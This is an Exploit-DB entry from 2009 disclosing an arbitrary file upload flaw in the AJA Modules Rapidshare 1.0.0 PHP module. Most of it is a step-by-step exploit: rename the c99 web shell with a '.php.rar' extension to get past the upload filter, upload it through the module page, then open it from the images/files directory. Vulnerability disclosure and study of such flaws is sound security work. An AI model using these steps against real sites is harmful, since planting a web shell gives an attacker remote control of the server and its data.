AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload

EDB-ID:

7960

CVE:

N/A


Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2009-02-03


AJA Modules Rapidshare 1.0.0 Remote Shell Upload Vulnerability

______________________________

AUTHOR : Hussin X

Home   : WwW.IQ-TY.CoM   &  WwW.TrYaG.cc

Mail   : darkangel_G85@yahoo.com

______________________________


script : http://www.magtrb.com/en/modules.php?name=Downloads&op=getit&lid=6


________________________________

exploit :

1.

Change Type Shell from c99.Php to c99.php.rar


and go to

http://localhost/AJA/modules.php?name=Rapidshare


Browse , select your shell , and Click Enter


the uploaded file ( shell )  Will find it here


http://localhost/images/files/c99.php.rar


________________________________



Greetings  : all my friends  |  IQ-SecuritY   |  TrYaG   | Milw0rM

# milw0rm.com [2009-02-03]